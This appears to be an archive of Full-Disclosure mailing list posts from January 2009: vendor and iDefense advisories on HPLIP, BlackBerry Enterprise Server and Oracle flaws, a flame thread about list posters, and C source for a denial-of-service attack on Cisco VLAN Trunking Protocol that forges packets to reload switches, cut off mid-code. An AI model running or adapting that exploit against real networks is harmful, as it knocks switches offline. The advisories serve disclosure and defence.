TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at postmas...@3com.com. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-708-1] HPLIP vulnerability
=== Ubuntu Security Notice USN-708-1 January 13, 2009 hplip vulnerability https://launchpad.net/bugs/191299 === A security issue affects the following Ubuntu releases: Ubuntu 7.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 7.10: hplip 2.7.7.dfsg.1-0ubuntu5.3 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: It was discovered that an installation script in the HPLIP package would change permissions on the hplip config files located in user's home directories. A local user could exploit this and change permissions on arbitrary files upon an HPLIP installation or upgrade, which could lead to root privileges. Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.3.diff.gz Size/MD5: 149462 e8b5cb18aff082738bfcfe069eb873f5 http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.3.dsc Size/MD5: 1064 531e707f0cbace5f1eb82039e409c306 http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1.orig.tar.gz Size/MD5: 14361049 ae5165d46413db8119979f5b3345f7a5 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-data_2.7.7.dfsg.1-0ubuntu5.3_all.deb Size/MD5: 6898006 691895b0f8e5fc93bcb86d47d11da1af http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-doc_2.7.7.dfsg.1-0ubuntu5.3_all.deb Size/MD5: 4146918 d4e0b928aacc84bbe2a05862050a5963 http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-gui_2.7.7.dfsg.1-0ubuntu5.3_all.deb Size/MD5: 117628 91f0c9d09f2520e76b3a3e6cde4abd63 http://security.ubuntu.com/ubuntu/pool/universe/h/hplip/hpijs-ppds_2.7.7+2.7.7.dfsg.1-0ubuntu5.3_all.deb Size/MD5: 480134 59604754cef89d7b5ae128ecf20f44da amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hpijs_2.7.7+2.7.7.dfsg.1-0ubuntu5.3_amd64.deb Size/MD5: 341576 918813fb4741326051c7480ffeae9a9a http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-dbg_2.7.7.dfsg.1-0ubuntu5.3_amd64.deb Size/MD5: 770122 ccef78fc8a55b4e94318931964e9e97b http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.3_amd64.deb Size/MD5: 302856 f2a47e27a69aa016334a1ffdac105be1 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hpijs_2.7.7+2.7.7.dfsg.1-0ubuntu5.3_i386.deb Size/MD5: 334690 dd891b2df494fd1fbc46abd25b9ef7db http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-dbg_2.7.7.dfsg.1-0ubuntu5.3_i386.deb Size/MD5: 747250 4676694a4d20445e64f3f4dc91aaa44c http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.3_i386.deb Size/MD5: 290282 921463222e2b642fb5bc16083d8b70ac lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/h/hplip/hpijs_2.7.7+2.7.7.dfsg.1-0ubuntu5.3_lpia.deb Size/MD5: 337798 9c060add246bb5212706b9dd0d92cc51 http://ports.ubuntu.com/pool/main/h/hplip/hplip-dbg_2.7.7.dfsg.1-0ubuntu5.3_lpia.deb Size/MD5: 926096 af4481ea010212486ea621103329cf13 http://ports.ubuntu.com/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.3_lpia.deb Size/MD5: 290082 f26b9fc31e3457719b3102b3a9c77b5b powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hpijs_2.7.7+2.7.7.dfsg.1-0ubuntu5.3_powerpc.deb Size/MD5: 348258 66f9714865cad898e10e98ef83f6e443 http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-dbg_2.7.7.dfsg.1-0ubuntu5.3_powerpc.deb Size/MD5: 784504 0c76dac215474fc62900aea547168387 http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.3_powerpc.deb Size/MD5: 319006 52d13211d1681fe90b74951dc204a788 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hpijs_2.7.7+2.7.7.dfsg.1-0ubuntu5.3_sparc.deb Size/MD5: 332756 a3411ca114399f0359b949462e0313ab http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-dbg_2.7.7.dfsg.1-0ubuntu5.3_sparc.deb Size/MD5: 717210 401d1050417a9a8608198088abb9e305 http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.3_sparc.deb Size/MD5: 289370 f92c0c0f6a2f2ccef18d3874db728bf7 signature.asc Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by
[Full-disclosure] iDefense Security Advisory 01.13.09: RIM BlackBerry Enterprise Server Attachment Service PDF Distiller 'bitmaps' Heap Overflow Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 iDefense Security Advisory 01.12.09 http://labs.idefense.com/intelligence/vulnerabilities/ Jan 12, 2009 I. BACKGROUND The BlackBerry Enterprise Server is a suite of applications used to connect enterprise email and messaging services to BlackBerry device users. It consists of a variety of applications, one of which is the Attachment Service. This application is used to convert email attachments into a format that is easily rendered on BlackBerry devices. When a user requests an attachment on their BlackBerry device, the Attachment Service will obtain the attachment, parse and convert it, and then send it to the user for viewing. The Attachment Service is capable of converting a variety of different file formats, including PDF files. This vulnerability affects the PDF filter/distiller. For more information, see the vendor's site found at the following link. http://na.blackberry.com/eng/services/server/ II. DESCRIPTION Remote exploitation of a heap overflow vulnerability in Research In Motion Ltd. (RIM)'s BlackBerry Enterprise Server could allow an attacker to execute arbitrary code with the privileges of the affected service, usually SYSTEM. The vulnerability occurs when parsing a data stream inside of a PDF file. During parsing, a dynamic array is filled up with pointers to certain objects without properly checking to see whether the array is large enough to hold all of the pointers. By inserting a large number of pointers, it is possible to overflow the array, and corrupt object pointers. This can lead to the EIP register being controlled, which results in the execution of arbitrary code. III. ANALYSIS Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the Attachment Service, usually SYSTEM. In order to exploit this vulnerability, an attacker must e-mail an enterprise BlackBerry user a malicious PDF file. Then, the user must attempt to view the file on their device. It is important to note that a user must request the attachment in order to trigger the parsing. It is not possible to exploit this vulnerability in a completely automated fashion without a user asking to view the file. However, after a user has requested the attachment, no further interaction is necessary. In Labs testing, it was possible to gain code execution, albeit unreliably. It is likely that with additional heap sculpting reliable code execution is possible. IV. DETECTION iDefense has confirmed the existence of this vulnerability in BlackBerry Enterprise Server version 4.1.5 and 4.1.6 (4.1 SP5, SP6). 4.1.6 is the most current version, as of the publishing of this report. This vulnerability was confirmed in BlackBerry Enterprise Server for Microsoft Exchange, but is believed to affect the Lotus and Novell versions as well. Previous versions may also be affected. V. WORKAROUND It is possible to disable the PDF Distiller, which will prevent the conversion of PDF files by the Attachment Server. The following workaround was suggested by RIM for a previous PDF Distiller vulnerability, and has been verified to prevent the vulnerability described in this report. This workaround can be accomplished as follows: To remove the PDF file extension from the list of supported file format extensions, complete the following actions: 1. From the Windows Desktop, open the BlackBerry Server Configuration tool. 2. Click the Attachment Server tab. 3. In the Format Extensions field, delete pdf: from the colon delimited list of extensions. 4. Click Apply. 5. Click OK. After this, it is also necessary to completely disable the PDF distiller from loading, which will prevent an attacker from renaming a PDF to some other format extension. In order to do this, complete the following steps: 1. On the Windows Desktop, open the BlackBerry Server Configuration tool. 2. Click the Attachment Server tab. 3. In the Configuration Option drop-down list, select Attachment Server. 4. In the Distiller Settings section, next to the distiller name Adobe PDF, clear the check box in the Enabled column. 5. Click Apply. 6. Click OK. 7. On the Windows Desktop, in Administrative Tools, open Services. 8. Right-click BlackBerry Attachment Service and click Stop. 9. Right-click BlackBerry Attachment Service and click Start. 10. Close Services. In Microsoft Exchange and Novell GroupWise environments, complete the following additional steps: 1. On the Windows Desktop, in Administrative Tools, open Services. 2. Right-click BlackBerry Dispatcher and click Stop. 3. Right-click BlackBerry Dispatcher and click Start. 4. Close Services. In IBM Lotus Domino environments, complete the following additional steps: 1. Open the IBM Lotus Domino Administrator. 2. Click the Server tab. 3. Click the Status tab. 4. Click Server Console. 5. In the Domino Command field, type tell BES quit and press ENTER. 6. In the
Re: [Full-disclosure] Full Disclosure Top List
as i said. im done posting about him, so i apologize to those ive inadvertantly pissed off in the wake of flushing him down the toilet. On Tue, Jan 13, 2009 at 1:32 PM, Fd Top List fdtopl...@live.se wrote: The top list of people posting to fd (allthough people like n3td3v have several aliases and are listed several times). .. | Top List For: January_2009 | +.--.+ | nr. | posts. | user. | ++--++ | 1 | 88 | n3td3v,andrew.wallace,sexyazngrl69 | 2 | 41 | Ureleet | | 3 | 39 | Avraham_Schneider | | 4 | 34 | j-f_sentier | | 5 | 19 | Valdis.Kletnieks_at_vt.edu| | 6 | 17 | Biz_Marqee| | 7 | 14 | Paul_Schmehl | | 8 | 11 | Mainbox_Notif | | 9 | 11 | James_Matthews| | 10| 10 | Ed_Carp | ''--'' .. | Top List For: December_2008| +.--.+ | nr. | posts. | user. | ++--++ | 1 | 78 | Ureleet | | 2 | 76 | n3td3v| | 3 | 26 | Valdis.Kletnieks_at_vt.edu| | 4 | 25 | James_Matthews| | 5 | 22 | j-f_sentier | | 6 | 17 | Elazar_Broad | | 7 | 15 | Bipin_Gautam | | 8 | 12 | zdi-disclosures_at_3com.com | | 9 | 12 | security_at_mandriva.com | | 10| 12 | Mike_C| ''--'' .. | Top List For: November_2008| +.--.+ | nr. | posts. | user. | ++--++ | 1 | 112 | n3td3v| | 2 | 61 | Ureleet | | 3 | 35 | Valdis.Kletnieks_at_vt.edu| | 4 | 30 | adrian.lamo_at_hushmail.com | | 5 | 22 | James_Matthews| | 6 | 21 | Trollie_Fingers | | 7 | 18 | Mike_C| | 8 | 15 | vulcanius | | 9 | 15 | security_at_mandriva.com | | 10| 14 | Fredrick_Diggle | ''--'' I believe that n3td3v is trying to destroy this list so that his history here somehow magically dissapears, this will not happen ofcourse because what gets posted to the Internet stays on the Internet and is available for future employers to see for all eternity. ## In case someone else wants to use this script: ## #!/bin/bash LIST_SIZE=13 function _get() { MONTH=$2.txt; URL=$1; wget $URL -O $MONTH 1/dev/null 2/dev/null; #ignore if name contains quotations etc. echo..; echo -n | Top List For: $2 let S=37-$(echo $2 | wc -c); for space in $(seq 0 $S); do echo -n ; done echo|; echo+.--.+; echo| nr. | posts. | user. |; echo++--++; PRE=$(cat $MONTH | grep | sed -e 's/^...//g' -e 's/ /_/g' | sort | uniq -c | sort -rn | head -n $LIST_SIZE | sed -e 's/^[ \t]*//g' -e 's/ /y/g'); COUNT=1; for CURRENT in $(echo $PRE); do declare -a ITEMS=($(echo $CURRENT | sed 's/y/ /g')); # format nr col echo -n | $COUNT; let S=6-$(echo $COUNT | wc -c); for space in $(seq 0 $S); do echo -n ; done # format posts. col. echo -n | ${ITEMS[0]}; let S=8-$(echo ${ITEMS[0]} | wc -c); for space in $(seq 0 $S); do echo -n ; done echo -n |; # format user col. echo -n ${ITEMS[1]}; if [ $(echo ${ITEMS[1]} | wc -c) -gt 28 ]; then ITEMS[1]=$(echo ${ITEMS[1]} | sed 's/\(^.\{,28\}\).*$/\1/g'); fi let S=28-$(echo ${ITEMS[1]} | wc -c); for space in $(seq 0 $S); do echo -n ; done
[Full-disclosure] iDefense Security Advisory 01.13.09: RIM BlackBerry Enterprise Server Attachment Service PDF Distiller Uninitialized Memory Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 iDefense Security Advisory 01.12.09 http://labs.idefense.com/intelligence/vulnerabilities/ Jan 12, 2009 I. BACKGROUND The BlackBerry Enterprise Server is a suite of applications used to connect enterprise email and messaging services to BlackBerry device users. It consists of a variety of applications, one of which is the Attachment Service. This application is used to convert email attachments into a format that is easily rendered on BlackBerry devices. When a user requests an attachment on their BlackBerry device, the Attachment Service will obtain the attachment, parse and convert it, and then send it to the user for viewing. The Attachment Service is capable of converting a variety of different file formats, including PDF files. This vulnerability affects the PDF filter/distiller. For more information, see the vendor's site found at the following link. http://na.blackberry.com/eng/services/server/ II. DESCRIPTION Remote exploitation of an uninitialized memory vulnerability in Research In Motion Ltd.'s BlackBerry Enterprise Server could allow an attacker to execute arbitrary code with the privileges of the affected service, which is usually SYSTEM. The vulnerability occurs when parsing a data stream inside of a PDF file. Due to a logic error, it is possible to allocate an array of object pointers that is never initialized. This array is located on the heap. When the object that contains this array is destroyed, each pointer in the array is deleted. Since the memory is never properly initialized, whatever content was previously there is used. It is possible to control the chunk of memory that gets allocated for this array, which can lead to attacker-controlled values being used as object pointers. This results in the execution of arbitrary code when these pointers are deleted. III. ANALYSIS Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the Attachment Service, usually SYSTEM. In order to exploit this vulnerability, an attacker must email an enterprise BlackBerry user a malicious PDF file. Then, the user must attempt to view the file on their device. It is important to note that a user must request the attachment in order to trigger the parsing. It is not possible to exploit this vulnerability in a completely automated fashion without a user asking to view the file. However, after a user has requested the attachment, no further interaction is necessary. Labs testing has demonstrated that this vulnerability is highly exploitable. It is possible to layout the heap in such a way that a previously allocated chunk of fully controllable memory is reused for the uninitialized memory clock. Code execution is then gained when this memory is used as an array of object pointers. IV. DETECTION iDefense has confirmed the existence of this vulnerability in BlackBerry Enterprise Server version 4.1.5 and 4.1.6 (4.1 SP5, SP6). 4.1.6 is the most current version, as of the publishing of this report. This vulnerability was confirmed in BlackBerry Enterprise Server for Microsoft Exchange, but is believed to affect the Lotus and Novell versions as well. Previous versions may also be affected. V. WORKAROUND It is possible to disable the PDF Distiller, which will prevent the conversion of PDF files by the Attachment Server. The following workaround was suggested by RIM for a previous PDF Distiller vulnerability, and has been verified to prevent the vulnerability described in this report. This workaround can be accomplished as follows: To remove the PDF file extension from the list of supported file format extensions, complete the following actions: 1. From the Windows Desktop, open the BlackBerry Server Configuration tool. 2. Click the Attachment Server tab. 3. In the Format Extensions field, delete pdf: from the colon delimited list of extensions. 4. Click Apply. 5. Click OK. After this, it is also necessary to completely disable the PDF distiller from loading, which will prevent an attacker from renaming a PDF to some other format extension. In order to do this, complete the following steps: 1. On the Windows Desktop, open the BlackBerry Server Configuration tool. 2. Click the Attachment Server tab. 3. In the Configuration Option drop-down list, select Attachment Server. 4. In the Distiller Settings section, next to the distiller name Adobe PDF, clear the check box in the Enabled column. 5. Click Apply. 6. Click OK. 7. On the Windows Desktop, in Administrative Tools, open Services. 8. Right-click BlackBerry Attachment Service and click Stop. 9. Right-click BlackBerry Attachment Service and click Start. 10. Close Services. In Microsoft Exchange and Novell GroupWise environments, complete the following additional steps: 1. On the Windows Desktop, in Administrative Tools, open Services. 2. Right-click BlackBerry Dispatcher and click Stop. 3. Right-click
Re: [Full-disclosure] Full Disclosure Top List
On Tue, Jan 13, 2009 at 9:24 PM, Ureleet urel...@gmail.com wrote: as i said. im done posting about him, so i apologize to those ive inadvertantly pissed off in the wake of flushing him down the toilet. You *haven't* flushed me down the toilet, *you* made up lies about me on full-disclosure that *some* gullible people believed and decided to gang up on me believing all the things you were saying about me were true. *You* have wasted a lot of peoples time. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] iDefense Security Advisory 01.13.09: Oracle Database 10g R2 Summary Advisor Arbitrary File Rewrite Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 iDefense Security Advisory 01.12.09 http://labs.idefense.com/intelligence/vulnerabilities/ Jan 12, 2009 I. BACKGROUND Oracle Database Server is a family of database products that range from personal databases to enterprise solutions. Further information is available at the following URL: http://www.oracle.com/database/index.html II. DESCRIPTION Local exploitation of an arbitrary file rewrite vulnerability in Oracle Corp.'s Oracle Database 10g Release 2 database product allows attackers to gain elevated privileges. The vulnerability exists in a function that allows a user with an authenticated session to create any file or rewrite any files to which the database account has access. III. ANALYSIS Successful exploitation allows the attacker to gain database account privilege. On Linux and Unix systems the database account is usually 'oracle' while on Windows systems it is the 'SYSTEM' account. To exploit this vulnerability, the attacker must create a session and execute the privileged procedure. IV. DETECTION iDefense has confirmed the existence of this vulnerability in Oracle Database 10g Release 2 version 10.2.0.3.0 on 32-bit Linux platform and Windows platform. Previous versions may also be affected. Oracle Database 11g Release 1 version 11.1.0.6.0 is not affected by this vulnerability. V. WORKAROUND iDefense is currently unaware of any workaround for this issue. VI. VENDOR RESPONSE Oracle has released a patch which addresses this issue. For more information, consult their advisory at the following URL. http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-3997 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 03/24/2008 - Initial Vendor Notification 03/25/2008 - Initial Vendor Response 11/24/2008 - Status update from Vendor 01/12/2009 - Coordinated Public Disclosure IX. CREDIT This vulnerability was reported to iDefense by Code Audit Labs (http://vulnhunt.com). Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2009 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerserv...@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJbRdibjs6HoxIfBkRAv6CAKCa1cUtfi1arGPT0w1RpxOtRC2UNQCfaB0N tk0EnS1YCSDeA7xSxi6Xs5w= =NyBd -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] iDefense Security Advisory 01.13.09: Oracle Secure Backup Administration Server login.php Command Injection Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 iDefense Security Advisory 01.13.09 http://labs.idefense.com/intelligence/vulnerabilities/ Jan 13, 2009 I. BACKGROUND Oracle Corp.'s Secure Backup is a tape backup management software, for more information, please visit following website: http://www.oracle.com/technology/products/secure-backup/index.html II. DESCRIPTION Remote exploitation of two command injection vulnerabilities in the authentication component of Oracle Corp.'s Secure Backup Administration Server could allow an unauthenticated attacker to execute arbitrary commands in the context of the running server. In both cases, the vulnerabilities exist in PHP scripts that authenticate a user attempting to use the service. The first vulnerability is in php/login.php. By making a login request with a specially crafted cookie value, an attacker can execute arbitrary code on the server. The second vulnerability is in php/common.php. This function is called from the login.php page. A variable is used to specify a command to be run. An attacker can supply any shell command for this variable and it will be executed in the context of the web server process. III. ANALYSIS Exploitation allows an attacker to execute arbitrary shell commands in the context of the web server process. Under Windows, the Administration Server runs as SYSTEM, so the injected command will be executed as SYSTEM. Under Linux it runs as an unprivileged user. No authentication is required to exploit this vulnerability. IV. DETECTION Oracle Corp.'s Secure Backup version 10.2.0.2 for Linux, and Secure Backup version 10.2.0.2 for Windows have been confirmed vulnerable. Other versions and other platforms may also be affected. V. WORKAROUND Block access to the httpd interface of vulnerable servers. VI. VENDOR RESPONSE Oracle has released a patch which addresses this issue. For more information, consult their advisory at the following URL. http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-4006 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 07/18/2008 Initial Vendor Notification 07/30/2008 Initial Vendor Reply 11/24/2008 Additional Vendor Feedback 01/13/2009 Coordinated Public Disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2009 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerserv...@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJbR5Dbjs6HoxIfBkRAiqHAKDxgxrDdjVEkqbYmee6NGCIeoKOLACgtl24 BAfUScwWY6Jz5DBquOL3cbE= =MpPP -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] iDefense Security Advisory 01.13.09: Oracle Secure Backup Administration Server login.php Command Injection Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 iDefense Security Advisory 01.13.09 http://labs.idefense.com/intelligence/vulnerabilities/ Jan 13, 2009 I. BACKGROUND Oracle Secure Backup is a network backup system for Oracle Databases. For more information, see: http://www.oracle.com/database/secure-backup.html II. DESCRIPTION Remote exploitation of an input validation vulnerability in the authentication component of Oracle Corp.'s Secure Backup Administration Server could allow an unauthenticated attacker to execute arbitrary commands in the context of the running server. The vulnerability is in a function of common.php which is called from the login.php page. The script fails to sanitize the input when verifying the user has permission to use the service. III. ANALYSIS Successful exploitation allows an attacker to gain complete control over an affected system. Because the the Administration Server runs as an unprivileged user, commands will be executed as that user. Under the Linux (and possibly other) installations many files are installed world writable. These include the configuration file for the Apache web-server that the Administration Server is built on. This server starts as the root user and changes to a user specified by the configuration files. Since these files are writable by the user it may be possible for them to gain access to the root user account. Other configuration and executable files are also able to be changed. IV. DETECTION Oracle Corp.'s Secure Backup version 10.1.0.3 for Linux has been confirmed vulnerable. Other versions and other platforms may also be affected. V. WORKAROUND Block access to the httpd interface of vulnerable servers Remove write access for 'other' users to all files. The following command will recursively change the permissions to remove write permission to 'other'. chmod -R o-w directory/ This may prevent some aspects of the system from functioning correctly. VI. VENDOR RESPONSE Oracle has released a patch which addresses this issue. For more information, consult their advisory at the following URL. http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-5449 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 03/08/2007 Initial Vendor Notification 03/08/2007 Initial Vendor Reply 11/24/2008 Additional Vendor Feedback 01/13/2009 Coordinated Public Disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2009 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerserv...@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJbSVqbjs6HoxIfBkRArHaAJsFJIEtFoycfmcGAbikDpSDFvBrWwCfbLR0 qVu5Ie2NSW2bRoITpl4Jix4= =VahW -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DoS code for Cisco VLAN Trunking Protocol Vulnerability
/*DoS code for Cisco VLAN Trunking Protocol Vulnerability * *vulerability discription: *http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml * *To Known: * 1.the switch must in Server/Client Mode. * 2.the port ,attacker connected,must be in trunk Mode. * Cisco Ethernet ports with no configuration are not * in trunk.but trunk mode can be obtained through DTP * attack by Yersinia. * 3.you must known the vtp domain,this can be sniffed * 4.some codes are from Yersinia. * *Result: * switch reload. * * *Compile: * gcc -o vtp `libnet-config --libs` vtp.c * *Usage:vtp -i interface -d vtp_domain * *Contact: showrun.lee[AT]gmail.com *http://sh0wrun.blogspot.com/ */ #include libnet.h #include stdio.h #include stdlib.h #define VTP_DOMAIN_SIZE32 #define VTP_TIMESTAMP_SIZE 12 struct vtp_summary { u_int8_t version; u_int8_t code; u_int8_t followers; u_int8_t dom_len; u_int8_t domain[VTP_DOMAIN_SIZE]; u_int32_t revision; u_int32_t updater; u_int8_t timestamp[VTP_TIMESTAMP_SIZE]; u_int8_t md5[16]; }; struct vtp_subset { u_int8_t version; u_int8_t code; u_int8_t seq; u_int8_t dom_len; u_int8_t domain[VTP_DOMAIN_SIZE]; u_int32_t revision; }; void usage( char *s) { printf(%s -i interface -d vtp domain\n,s); exit (1); } int main( int argc, char *argv[] ) { int opt,k=0; extern char *optarg; libnet_ptag_t t; libnet_t *lhandler; u_int32_t vtp_len=0, sent; struct vtp_summary *vtp_summ; struct vtp_subset *vtp_sub; u_int8_t *vtp_packet,*vtp_packet2, *aux; u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 }; u_int8_t dst_mac[6]={ 0x01,0x00,0x0c,0xcc,0xcc,0xcc }; u_int8_t aaa[8]={ 0x22,0x00,0x11,0x22,0x11,0x00,0x00,0x00 }; struct libnet_ether_addr *mymac; char *device; char error_information[LIBNET_ERRBUF_SIZE]; char *domain; // get options while ((opt = getopt(argc, argv, i:d:)) != -1) { switch (opt) { case 'i': device=malloc(strlen(optarg)); strcpy(device,optarg); k=1; break; case 'd': domain=malloc(strlen(optarg)); strcpy(domain,optarg); break; default: usage(argv[0]); } } if(!k) { printf( %s -i interface -d vtp domain\n must assign the interface\n,argv[0]);exit(1);} //init libnet lhandler=libnet_init(LIBNET_LINK,device,error_information); if (!lhandler) { fprintf(stderr, libnet_init: %s\n, error_information); return -1; } mymac=libnet_get_hwaddr(lhandler); //build the first packet for vtp_summary vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary); vtp_packet = calloc(1,vtp_len); aux = vtp_packet; memcpy(vtp_packet,cisco_data,sizeof(cisco_data)); aux+=sizeof(cisco_data); vtp_summ = (struct vtp_summary *)aux; vtp_summ-version = 0x01; vtp_summ-code = 0x01;//vtp_summary vtp_summ-followers = 0x01; vtp_summ-dom_len = strlen(domain); memcpy(vtp_summ-domain,domain,strlen(domain)); vtp_summ-revision = htonl(2000);//bigger than the current revision number will ok t = libnet_build_802_2( 0xaa,/* DSAP */ 0xaa,/* SSAP */ 0x03,/* control */ vtp_packet, /* payload */ vtp_len, /* payload size */ lhandler,/* libnet handle */ 0); /* libnet id */ t = libnet_build_802_3( dst_mac, /* ethernet destination */ mymac-ether_addr_octet, /* ethernet source */ LIBNET_802_2_H + vtp_len, /* frame size */ NULL, /* payload */ 0,/* payload size */ lhandler, /* libnet handle */ 0); /* libnet id */ sent = libnet_write(lhandler); if (sent == -1) { libnet_clear_packet(lhandler); free(vtp_packet); return -1; } libnet_clear_packet(lhandler); //build the second vtp packet for vtp_subset vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset); vtp_packet2 = calloc(1,vtp_len); aux = vtp_packet2; memcpy(vtp_packet2,cisco_data,sizeof(cisco_data)); 